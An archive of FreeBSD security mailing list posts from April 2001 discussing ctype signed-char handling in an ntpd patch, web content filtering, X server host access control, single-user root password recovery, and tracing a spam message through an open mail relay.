X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 17:56:12 -0700, Matt Dillon wrote: > > Now, I don't think FreeBSD cares about this at all. However, many Yes, FreeBSD cares and sensitive, since we have signed chars by default. > This is just common sense, really. How generic do we want the code > to be? It certainly doesn't hurt. 1) Negative ctype offsets can produce false hits/miss (if addressed memory present) causing wrong interpretation of data. 2) Negative ctype offsets can produce off memory requests (addressed memory not present) causing core dumps. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 19:36: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id D11EE37B43E for ; Thu, 5 Apr 2001 19:35:58 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id MAA01530; Fri, 6 Apr 2001 12:34:52 +1000 (EST) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37640) with ESMTP id <01K22VL1RIOGRW0B54@cim.alcatel.com.au>; Fri, 6 Apr 2001 12:34:47 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f362Yin80101; Fri, 06 Apr 2001 12:34:44 +1000 (EST envelope-from jeremyp) Content-return: prohibited Date: Fri, 06 Apr 2001 12:34:44 +1000 From: Peter Jeremy Subject: Re: ntpd patch In-reply-to: <200104060056.f360uCN35967@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 05:56:12PM -0700 To: Matt Dillon Cc: Brian Somers , security@FreeBSD.ORG Mail-Followup-To: Matt Dillon , Brian Somers , security@FreeBSD.ORG Message-id: <20010406123444.F66243@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060056.f360uCN35967@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-Apr-05 17:56:12 -0700, Matt Dillon wrote: > The cast to unsigned char simply ensures that when the character is > expanded to an integer in the procedure call, it is not converted > into a negative number. > > Now, I don't think FreeBSD cares about this at all. Having looked at the actual macro expansions a day or so ago... If you pass a negative number to any of the isXXX() macros, you get a result of 0. This means that it is safe to pass a char to isXXX(), but the result may be incorrect for locale's other than `c'. The domain of isXXX() is restricted to values representable as unsigned char and EOF - ie [-1..255] for most implementations. Traditionally, isXXX() was commonly implemented as: extern some_int_type _ctype[257]; #define isXXX(c) (_ctype[(c)+1] & _CTYPE_XXX) which is undefined for values outside the allowable domain. FreeBSD adds range checking and returns 0 instead of de-referencing random memory in this case. FreeBSD also has some inline function wrappers so that the "char used as a subscript" warning is masked (which is probably unfortunate in this case). > This is just common sense, really. How generic do we want the code > to be? It certainly doesn't hurt. In this case, there's no reason not to do it correctly - which means using something like "isspace((unsigned char)(*(tp-1)))". (My preference would be "isspace((unsigned char)tp[-1])", but that is just cosmetic). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 23:59:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id B215C37B446 for ; Thu, 5 Apr 2001 23:59:28 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=f0398585d9e4c4b629560f1981ddfb83) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14lQBu-0000Ii-00; Fri, 06 Apr 2001 00:57:54 -0600 Message-ID: <3ACD68F2.E0604EF1@softweyr.com> Date: Fri, 06 Apr 2001 00:57:54 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Cy Schubert - ITSD Open Systems Group Cc: Olivier Nicole , uknowho@n0mansland.net, freebsd-security@FreeBSD.ORG Subject: Re: Filtering inappropriate content References: <200103280604.f2S648R14405@cwsys.cwsent.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert - ITSD Open Systems Group wrote: > > In message <200103280405.LAA16283@banyan.cs.ait.ac.th>, Olivier Nicole > writes: > > >The organization is looking to filter web content only. Apolgies for > > >the confusion. > > > > Squid has some rules to do contents filtering I guess. > > I tried it. Squid is not all that effective. For example, matching > expressions can be found in perfectly legitimate URL's, e.g. a sun.com > web page has the character string "sex" in it (I think it was a Virtual > Adrien component called RICHPsex), so my filter blocked it. I'm sure > that operators of web sites that you want to block could name their > files and directories with non-offending names, bypassing your filter. > A squid filter may not have the desired effect. > > The only solution I can think of that works is to subscribe to a > service that maintains a database of offending sites. Real-time analysis is much more effective. Visit the RuleSpace site for information on a commercial SDK that can do this on FreeBSD. http://www.rulespace.com/contexion/products/eatk/ -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 3:34:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from q3.cybg.com (digex-ext.cybg.com [209.119.171.80]) by hub.freebsd.org (Postfix) with SMTP id 957BB37B422 for ; Fri, 6 Apr 2001 03:34:37 -0700 (PDT) (envelope-from kreed@cyberguard.com) Message-ID: From: Kirk Reed To: "'|[TDP]| '" , "'freebsd-security@freebsd.org '" Subject: Unsubscribe Date: Fri, 6 Apr 2001 06:34:42 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe tdp@psynet.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 5: 6:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.ioffe.rssi.ru (relay.ioffe.rssi.ru [194.85.224.33]) by hub.freebsd.org (Postfix) with ESMTP id 2C25937B424 for ; Fri, 6 Apr 2001 05:06:03 -0700 (PDT) (envelope-from kopts@astro.ioffe.rssi.ru) Received: from astro.ioffe.rssi.ru (astro.ioffe.rssi.ru [194.85.229.130]) by relay.ioffe.rssi.ru (8.9.1/8.9.1) with ESMTP id QAA09337; Fri, 6 Apr 2001 16:05:42 +0400 (MSD) Received: by astro.ioffe.rssi.ru (8.9.3/Clnt-2.14-AS-eef) id QAA52712; Fri, 6 Apr 2001 16:05:32 +0400 (MSD) Date: Fri, 6 Apr 2001 16:05:32 +0400 (MSD) From: Alexey Koptsevich To: Per Kristian Hove , Johan Danielsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Disabling xhost(1) Access Control In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, > | If you want to do that there are at least two places you have to > | change the behaviour in programs/Xserver/os/access.c: > | > | * for the `xhost +' case change ChangeAccessControl(), to only succeed > | for the enable case (paranoid people use `xhost -' routinely). > | > | * for `xhost +host' change AddHost() to your liking (ifdef out > | FamilyInternet). > > If you're paranoid, you should also change the default behaviour > of InvalidHost() [also in access.c] to return 1 instead of 0 if > AccessEnabled isn't set [if you're running with `xhost +', that > is]. This is where the access check actually takes place. Sorry, could you write what exactly should I change in the code? Thanks a lot, Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 5:55:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.unila.ac.id (ns1.unila.ac.id [202.158.47.162]) by hub.freebsd.org (Postfix) with SMTP id 3745D37B422 for ; Fri, 6 Apr 2001 05:55:16 -0700 (PDT) (envelope-from riki@maiser.unila.ac.id) Received: (qmail 1590 invoked from network); 6 Apr 2001 12:58:04 -0000 Received: from maiser.unila.ac.id (192.168.1.2) by ns1.unila.ac.id with SMTP; 6 Apr 2001 12:58:04 -0000 Received: from localhost (riki@localhost) by mail.unila.ac.id (8.9.3/8.9.3) with ESMTP id TAA58470 for ; Fri, 6 Apr 2001 19:46:26 +0700 (JAVT) (envelope-from riki@maiser.unila.ac.id) Date: Fri, 6 Apr 2001 19:46:26 +0700 (JAVT) From: Q Yai QQ To: security@FreeBSD.org Subject: Re: ntpd patch In-Reply-To: <20010406123444.F66243@gsmx07.alcatel.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi guys,.. usually,.i use user toor as my back up root,.. but,.. i forgot,.. how the trouble shooter if i forgot root's passwd i try to boot -s my computer,... then,.. when i type #passwd root or #vipw or #vi master.passwd the commands are not found.... can u help me guys,.. to explain step by steps,..?? thank's a lot,.. >>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<< riki@unila.ac.id visit my homepage and sign my guestbook http://unilanet.unila.ac.id/~qq --------------------------------------- --------------------------------------- & __& &__ // \\ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 6: 2:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4A25D37B423 for ; Fri, 6 Apr 2001 06:02:30 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1581 invoked by uid 1000); 6 Apr 2001 13:01:16 -0000 Date: Fri, 6 Apr 2001 16:01:16 +0300 From: Peter Pentchev To: Q Yai QQ Cc: security@FreeBSD.org Subject: Re: ntpd patch Message-ID: <20010406160116.E447@ringworld.oblivion.bg> Mail-Followup-To: Q Yai QQ , security@FreeBSD.org References: <20010406123444.F66243@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from riki@maiser.unila.ac.id on Fri, Apr 06, 2001 at 07:46:26PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 06, 2001 at 07:46:26PM +0700, Q Yai QQ wrote: > hi guys,.. > > usually,.i use user toor as my back up root,.. > > but,.. i forgot,.. > how the trouble shooter if i forgot root's passwd > > i try to boot -s my computer,... > > > then,.. when i type #passwd root > or #vipw > or #vi master.passwd > > the commands are not found.... > > can u help me guys,.. > to explain step by steps,..?? > > thank's a lot,.. The commands are not found for one of two possible reasons - you have not mounted the /usr filesystem, or /usr/bin is not in your path. You can work around those by executing the following commands after the boot -s mount /usr mount -u -o rw / PATH=/usr/sbin:/usr/bin:$PATH export PATH EDITOR=/usr/bin/vi reboot That should be enough. G'luck, Peter -- I am jealous of the first word in this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 6: 6:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id AB6DD37B42C for ; Fri, 6 Apr 2001 06:06:34 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id A40AC1360C; Fri, 6 Apr 2001 09:06:55 -0400 (EDT) Date: Fri, 6 Apr 2001 09:06:55 -0400 From: Chris Faulhaber To: Q Yai QQ Cc: security@FreeBSD.org Subject: Re: ntpd patch Message-ID: <20010406090655.A97168@peitho.fxp.org> References: <20010406123444.F66243@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from riki@maiser.unila.ac.id on Fri, Apr 06, 2001 at 07:46:26PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Apr 06, 2001 at 07:46:26PM +0700, Q Yai QQ wrote: > hi guys,.. >=20 > usually,.i use user toor as my back up root,.. >=20 > but,.. i forgot,.. > how the trouble shooter if i forgot root's passwd=20 >=20 > i try to boot -s my computer,... >=20 >=20 > then,.. when i type #passwd root=20 > or #vipw > or #vi master.passwd=20 >=20 > the commands are not found.... >=20 > can u help me guys,.. > to explain step by steps,..?? >=20 http://www.FreeBSD.org/FAQ/admin.html#FORGOT-ROOT-PW --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --KsGdsel6WgEHnImy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrNv28ACgkQObaG4P6BelCELwCgm6Wo5HGmygC7IR2FeLvpl49a GDgAoIAqCRuhxbrXOPQGi5yKci9a1VCB =VpTZ -----END PGP SIGNATURE----- --KsGdsel6WgEHnImy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 9:37:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from pop162-leg.mail.com (pop162-leg.mail.com [165.251.32.54]) by hub.freebsd.org (Postfix) with ESMTP id 3A1E537B43E for ; Fri, 6 Apr 2001 09:37:55 -0700 (PDT) (envelope-from megasitez@Iname.com) Received: from Iname.com (pD950C5AE.dip.t-dialin.net [217.80.197.174]) by pop162-leg.mail.com (Postfix) with SMTP id C49061C83B for ; Fri, 6 Apr 2001 12:37:53 -0400 (EDT) From: To: Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Message-Id: <20010406163753.C49061C83B@pop162-leg.mail.com> Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi Warezfreak, ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... http://www.hf2001.de/topsites/topsites.html the Mega-Sitez Team Team To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 9:47:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id 2934137B496 for ; Fri, 6 Apr 2001 09:47:43 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f36Gr1804720; Fri, 6 Apr 2001 09:53:01 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Fri, 6 Apr 2001 09:53:01 -0700 (PDT) From: mudman To: Cc: Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <20010406163753.C49061C83B@pop162-leg.mail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... This is a gross abuse of this list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 10: 9:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from sherline.com (sherline.net [216.120.87.2]) by hub.freebsd.org (Postfix) with SMTP id 6F14537B42C for ; Fri, 6 Apr 2001 10:09:03 -0700 (PDT) (envelope-from jgowdy@home.com) Received: (qmail 21793 invoked from network); 6 Apr 2001 17:08:56 -0000 Received: from unknown (HELO server2) (216.120.87.3) by 216.120.87.2 with SMTP; 6 Apr 2001 17:08:56 -0000 Message-ID: <001301c0bebc$44e39af0$035778d8@sherline.net> From: "Jeremiah Gowdy" To: "mudman" , Cc: References: Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Date: Fri, 6 Apr 2001 10:08:56 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > This is a gross abuse of this list. It's a massive crosspost too. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 10:13:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id D08A537B43E for ; Fri, 6 Apr 2001 10:13:40 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1066 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 6 Apr 2001 12:13:15 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Fri, 6 Apr 2001 12:13:15 -0500 (CDT) From: James Wyatt Cc: freebsd-security@FreeBSD.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <20010406163753.C49061C83B@pop162-leg.mail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) > From: megasitez@Iname.com > To: freebsd-security@FreeBSD.org > Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs > > hi Warezfreak, > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > http://www.hf2001.de/topsites/topsites.html > > the Mega-Sitez Team Team This is definately OT, it's a Linux system. I'll have to look later to see if it has any FreeBSD RootKits. (^_^) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11: 0:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from C126508-B.rchdsn1.tx.home.com (c126508-b.rchdsn1.tx.home.com [24.7.19.88]) by hub.freebsd.org (Postfix) with ESMTP id EC0F637B506 for ; Fri, 6 Apr 2001 11:00:18 -0700 (PDT) (envelope-from jdunfee@C126508-B.rchdsn1.tx.home.com) Received: (from jdunfee@localhost) by C126508-B.rchdsn1.tx.home.com (8.11.1/8.11.1) id f36IGMp52718; Fri, 6 Apr 2001 13:16:22 -0500 (CDT) (envelope-from jdunfee) From: "Jonathan D. Dunfee" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> Date: Fri, 6 Apr 2001 13:16:21 -0500 (CDT) To: freebsd-security@FreeBSD.ORG Cc: jdunfee@acm.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: References: <20010406163753.C49061C83B@pop162-leg.mail.com> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: Jonathan Dunfee Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On a slightly different thread, has anyone checked to see if this is coming directly from iname.com or if that place is being used as a relay? Either way someone should probably drop a dime on and request that stop this. I'm a little new at this, but it looks like it was forwarded by pop162-leg.mail.com (165.251.32.54) for pD950C5AE.dip.t-dialin.net (217.80.197.174). I check and pop162-leg.mail.com is definitely relaying mail. Is there someone who takes care of this? Jon James Wyatt writes: > On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) > > From: megasitez@Iname.com > > To: freebsd-security@FreeBSD.org > > Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs > > > > hi Warezfreak, > > > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > > > http://www.hf2001.de/topsites/topsites.html > > > > the Mega-Sitez Team Team > > This is definately OT, it's a Linux system. I'll have to look later to see > if it has any FreeBSD RootKits. (^_^) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jonathan D. Dunfee jdunfee@acm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11: 7:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 5FA5D37B424 for ; Fri, 6 Apr 2001 11:07:25 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org ([64.183.199.40]) by poontang.schulte.org (8.12.0.Beta5/8.12.0.Beta5) with ESMTP id f36I7IIr070257; Fri, 6 Apr 2001 13:07:18 -0500 (CDT) Message-Id: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Fri, 06 Apr 2001 13:06:52 -0500 To: Jonathan Dunfee , freebsd-security@FreeBSD.ORG From: Christopher Schulte Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Cc: jdunfee@acm.org In-Reply-To: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> References: <20010406163753.C49061C83B@pop162-leg.mail.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote: >I check and pop162-leg.mail.com is definitely relaying >mail. I generally don't reply re: 'spam' on mailing lists, but this question is valid and should be answered: >Is there someone who takes care of this? http://www.mail-abuse.org/ RSS runs a database of open relays which are reported to them by the Internet community. They operate a 'DNS BLACKLIST' where mail admins can add hooks into their MTAs which will check every incoming smtp connection and see if RSS has listed the box as an open relay. Such messages are discarded before they ever hit a user's spool. There are other such lists of this nature... ORBS being the biggest one that I can think of. >Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:13:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id AEE7037B422 for ; Fri, 6 Apr 2001 11:13:15 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f36ID9e31819; Fri, 6 Apr 2001 14:13:09 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 6 Apr 2001 14:13:05 -0400 (EDT) From: Rob Simmons To: "Jonathan D. Dunfee" Cc: , Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 The originating IP is 217.80.197.174 and its owned by t-online.de Their info is: address: T-Online International AG address: Waldstrasse 3 address: 64331 Weiterstadt address: DE e-mail: d.kaufmann@t-online.net address: Deutsche Telekom Online Service GmbH address: Waldstrasse 3 address: 64331 Weiterstadt address: DE phone: +49 6151 680 537 fax-no: +49 6151 680 519 e-mail: hostmaster@t-online.net The IP that relayed the mail is 165.251.32.54 and it is an open relay. Its already blocked by ORBS right now. It is run by mail.com and they don't care, so good luck getting them to fix it. Here is the contact info for mail.com: iName, Inc. 11 Broadway, Suite 660 New York, NY 10004 US 212-425-3477 Good Luck! Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 6 Apr 2001, Jonathan D. Dunfee wrote: > > On a slightly different thread, has anyone checked to > see if this is coming directly from iname.com or if that > place is being used as a relay? Either way someone should > probably drop a dime on and request that stop this. > > I'm a little new at this, but it looks like it was > forwarded by pop162-leg.mail.com (165.251.32.54) for > pD950C5AE.dip.t-dialin.net (217.80.197.174). > > I check and pop162-leg.mail.com is definitely relaying > mail. > > Is there someone who takes care of this? > > > Jon > > James Wyatt writes: > > On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > > > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) > > > From: megasitez@Iname.com > > > To: freebsd-security@FreeBSD.org > > > Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs > > > > > > hi Warezfreak, > > > > > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > > > > > http://www.hf2001.de/topsites/topsites.html > > > > > > the Mega-Sitez Team Team > > > > This is definately OT, it's a Linux system. I'll have to look later to see > > if it has any FreeBSD RootKits. (^_^) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > > Jonathan D. Dunfee > jdunfee@acm.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6zgc0v8Bofna59hYRA+HfAJ9aovVApqpDHGnLRmEzQseoOkzEYACbBwty BphRX7te/xDMQ96l8eDJlkI= =OGQ9 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:14:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id C662837B43C for ; Fri, 6 Apr 2001 11:14:52 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f36IEZS31886; Fri, 6 Apr 2001 14:14:35 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 6 Apr 2001 14:14:32 -0400 (EDT) From: Rob Simmons To: Christopher Schulte Cc: Jonathan Dunfee , , Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 http://spamcop.net is another good site for this. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 6 Apr 2001, Christopher Schulte wrote: > At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote: > >I check and pop162-leg.mail.com is definitely relaying > >mail. > > I generally don't reply re: 'spam' on mailing lists, but this question is > valid and should be answered: > > >Is there someone who takes care of this? > > http://www.mail-abuse.org/ > > RSS runs a database of open relays which are reported to them by the > Internet community. > > They operate a 'DNS BLACKLIST' where mail admins can add hooks into their > MTAs which will check every incoming smtp connection and see if RSS has > listed the box as an open relay. Such messages are discarded before they > ever hit a user's spool. > > There are other such lists of this nature... ORBS being the biggest one > that I can think of. > > >Jon > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6zgeLv8Bofna59hYRA1rmAJkBFHSfl2H+JW8RP39WeSWnkeUIxwCff+FY dY0WLcS4PjlqmBmaHMoJ5UY= =pBRl -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:17:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from eagle.capis.com (eagle-gw.capis.com [207.76.160.3]) by hub.freebsd.org (Postfix) with ESMTP id 902EF37B422 for ; Fri, 6 Apr 2001 11:17:44 -0700 (PDT) (envelope-from jdunfee@capis.com) Received: from 